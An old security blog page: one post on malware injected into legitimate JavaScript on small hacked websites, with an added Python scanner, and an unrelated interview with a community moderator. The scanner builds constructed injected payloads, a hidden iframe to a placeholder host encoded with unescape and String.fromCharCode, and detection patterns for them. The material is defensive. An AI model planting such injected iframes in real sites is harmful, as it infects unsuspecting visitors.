Monday 18 February 2013

Malware injected into legitimate JavaScript code on legitimate websites

This post looks at how malware spreads on the internet, with particular attention to the Italian situation:
As recently mentioned in the Sophos Security Threat Report, 80% of the websites where we detect malicious content are innocent sites that have been hacked.
A trend that we have observed is that hackers will insert their malicious code into legitimate JavaScript (not to be mixed up with Java!) hosted on the website.
The JavaScript is automatically loaded by the HTML webpages and inherits the reputation of the main site and the legitimate JavaScript.
In other words, if a user's anti-virus software did display an alert about malicious content, it might be shrugged off as a false positive and blamed on an unreliable detection of a legitimate piece of JavaScript code.
Recently SophosLabs has seen a flurry of detections of Troj/Iframe-JG on legitimate websites, including:
  • Primary School websites in England
  • Small community websites in Italy
  • A nightclub website in London
  • The website of an East African nation's TV company
  • The website of trade association of Financial Advisors in the US
Indeed, what I observe moderating the OpenDNS community is that the domains of large companies are almost never the targets; almost always it is the websites of small organisations, often unmonitored, built with open-source CMSs that have not been updated.
I mean small businesses, small municipalities, parishes, youth associations, professional practices.
I doubt that in these cases the site owners are aware of what is happening on their domain. The fact remains that the damage to their image is tangible, and once you are on the blacklists it is very hard to get off them.
What I would advise anyone considering opening a shop window on the internet is to rely on people who are able both to develop the site and to ensure its full security, which, in short, is the same thing @SophosLabs proposes at the end of its post:
"One of the key things that anyone - whether as an individual or working on behalf of a company - needs to consider when setting up a website, is how to choose a good hosting provider from the security point-of-view."
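The injection pattern the Sophos passage above describes (malicious markup appended to a legitimate .js file, typically a tiny or invisible iframe wrapped in URL or character-code encoding so it survives a casual look) can be checked for with a small scanner. The following is an added example, not code from this post or from SophosLabs: the indicators are generic hallmarks of injected hidden-iframe payloads that are assumed here, not a signature for Troj/Iframe-JG, and the sample JavaScript, the payload and the `example.invalid` host are constructed.

```python
"""Heuristic scanner for malicious markup injected into a site's JavaScript.

Added example, not code from the post or from SophosLabs. The indicators are
assumed generic hallmarks of injected hidden-iframe payloads, not a signature
for Troj/Iframe-JG. All sample JavaScript below is constructed.
"""
import re
import sys
from dataclasses import dataclass
from pathlib import Path
from urllib.parse import quote, unquote

# Matched against the raw line: a '<' hidden under an encoding, a
# decode-then-execute/inject construct, and a long String.fromCharCode blob.
RAW_INDICATORS = [
    ("encoded-markup", re.compile(r"%3C|\\x3c|\\u003c", re.I)),
    ("decode-and-run", re.compile(
        r"(eval|document\.write(ln)?)\s*\(\s*"
        r"(unescape|decodeURIComponent|String\.fromCharCode|atob)\s*\(", re.I)),
    ("charcode-blob", re.compile(r"String\.fromCharCode\((\s*\d+\s*,){8,}")),
]
# Matched after the encodings are peeled off: an iframe made invisible.
DECODED_INDICATORS = [
    ("hidden-iframe", re.compile(
        r"""<iframe\b[^>]*?(visibility\s*:\s*hidden|display\s*:\s*none"""
        r"""|\b(width|height)\s*=\s*['"]?[01]['"]?(?![\d%]))""", re.I)),
]


@dataclass(frozen=True)
class Finding:
    line: int
    indicator: str
    excerpt: str


def decode_layers(text: str, max_depth: int = 3) -> str:
    """Undo the wrappers injected HTML usually hides in: %XX URL escapes,
    backslash-x byte escapes and String.fromCharCode(...) number lists."""
    out = text
    for _ in range(max_depth):
        prev = out
        out = unquote(out)
        out = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), out)
        out = re.sub(r"String\.fromCharCode\(([\d,\s]+)\)",
                     lambda m: "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()),
                     out)
        if out == prev:          # nothing left to peel
            break
    return out


def scan_js(source: str) -> list[Finding]:
    """Return one Finding per (line, indicator) hit; [] for clean JavaScript."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        decoded = decode_layers(line)
        for name, pattern in RAW_INDICATORS:
            if (m := pattern.search(line)):
                findings.append(Finding(lineno, name, m.group(0)[:80]))
        for name, pattern in DECODED_INDICATORS:
            if (m := pattern.search(decoded)):
                findings.append(Finding(lineno, name, m.group(0)[:80]))
    return findings


def scan_tree(root: str) -> dict[str, list[Finding]]:
    """Scan every *.js below a web root (for instance an Apache DocumentRoot)."""
    results = {}
    for path in Path(root).rglob("*.js"):
        found = scan_js(path.read_text(errors="replace"))
        if found:
            results[str(path)] = found
    return results


# Constructed samples: a legitimate script, then the same script with a
# hidden-iframe payload appended, once URL-encoded and once charcode-encoded.
LEGIT_JS = """\
// site.js - legitimate menu toggling code (constructed sample)
function toggleMenu(id) {
  var el = document.getElementById(id);
  el.style.display = (el.style.display === 'none') ? 'block' : 'none';
}
"""
_PAYLOAD = ('<iframe src="http://example.invalid/in.php" width="1" height="1" '
            'style="visibility:hidden"></iframe>')          # constructed, host is reserved
INJECTED_URLENC_JS = LEGIT_JS + "document.write(unescape('%s'));\n" % quote(_PAYLOAD, safe="")
INJECTED_CHARCODE_JS = LEGIT_JS + "eval(String.fromCharCode(%s));\n" % ",".join(
    str(ord(c)) for c in "document.write('%s')" % _PAYLOAD)

if __name__ == "__main__":
    if len(sys.argv) > 1:                       # real web root given
        for path, found in scan_tree(sys.argv[1]).items():
            for f in found:
                print(f"{path}:{f.line}: {f.indicator}: {f.excerpt}")
    else:                                       # demo on the constructed samples
        for label, src in (("url-encoded", INJECTED_URLENC_JS), ("charcode", INJECTED_CHARCODE_JS)):
            for f in scan_js(src):
                print(f"{label} sample, line {f.line}: {f.indicator}: {f.excerpt}")
```

Save it as, say, `scan_js.py` and run `python3 scan_js.py /var/www/html` to list hits per file, or run it with no argument to see both constructed samples flagged on their appended line 6. Treat hits as leads, not verdicts: legitimate minifiers and packers also emit `eval`/`unescape`, so compare a flagged file against a known-good copy or a commit in version control before cleaning it, and remember that deleting the payload without updating the CMS that let it in only buys time.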

Sunday 10 February 2013

Meet Francesco, a Member of the Umbrella Labs Security Community

We’re searching for smart, passionate Internet security experts to join the Umbrella Labs Security Community. Members of the Umbrella Labs Security Community are on the front lines of Internet security, as they’re able to submit malicious and potentially malicious domains for community review and discussion. The community is made up of security researchers, IT technicians and software engineers from all around the globe who hold a strong dedication for keeping the Internet safe and secure.  For more information about how the whole process works, click here.
But rather than brag about how awesome the Umbrella Labs Security Community is, I thought I’d let a member of the community share his thoughts. Francesco, who lives in Italy, is one of the top contributors to the community.
Vinny: Tell us a bit about yourself
Francesco: I work as a sysadmin (Linux + VMware) for a big Italian IT company and I live near Palermo. You can find me on Twitter @mrbyte72, where I share about my personal interests, but not my work.
Vinny: What initially sparked your interest in internet security?
Francesco: My work revolves around Internet security questions, including Squid traffic log reporting and analysis, Apache web server security, Java vulnerabilities, patching operating systems, etc. I am convinced that anti-virus products alone are no longer sufficient to ensure a reasonable level of security.
Vinny: What is the best or most convincing scam that you’ve ever seen or heard about?
Francesco: Every morning I receive mail with incredible messages, but the most memorable attack I know of was Blaster, a blended threat that was discovered in 2003.
Vinny: Besides OpenDNS, what are your favorite tools of the trade to use?
Francesco: I work as a Linux/VMware sysadmin, so I have many:
  • OS: CentOS/Red Hat – Ubuntu Server;
  • Database: Oracle – MySQL – PostgreSQL;
  • Application server: Tomcat – JBoss – Orion – OC4J;
  • Web server: Apache – IIS – AWStats;
  • Proxy: Squid + DansGuardian – Calamaris;
  • Cluster: Red Hat Cluster – Heartbeat;
  • VMware: ESX, ESXi, vSphere;
  • Management: OpenNMS
Vinny: Certification is a big deal for security professionals. What credentials have you earned?
Francesco: I'm certified in VMware VCP4 and ITIL v3 Foundation + Service Operation.
Vinny:  What do you most enjoy about being a moderator?
Francesco: I'm a long-time OpenDNS user, and I know my contributions help to make the Internet at large safer.
Vinny:  What’s your most memorable contribution to the Umbrella Labs Security Community?
Francesco: The greatest thing about the Umbrella Security Labs method is that it combines the community with machine learning. Humans possess geographical and cultural knowledge that sometimes you just can't teach a machine. For example, I discovered that was tagged as malware. I know that this is one of the most-used Italian pre-paid credit cards, so I quickly alerted the Umbrella team that it was incorrectly tagged.
Vinny: Would you rather never have to sleep or never have to breathe?
Francesco: I love sleep, so I couldn’t give it up!
If you’re interested in joining Francesco and the Umbrella Labs Security Community, just apply online and let us know why you’d make a great contributor to the community.
The post Meet Francesco, a Member of the Umbrella Labs Security Community appeared first on Umbrella Security Labs.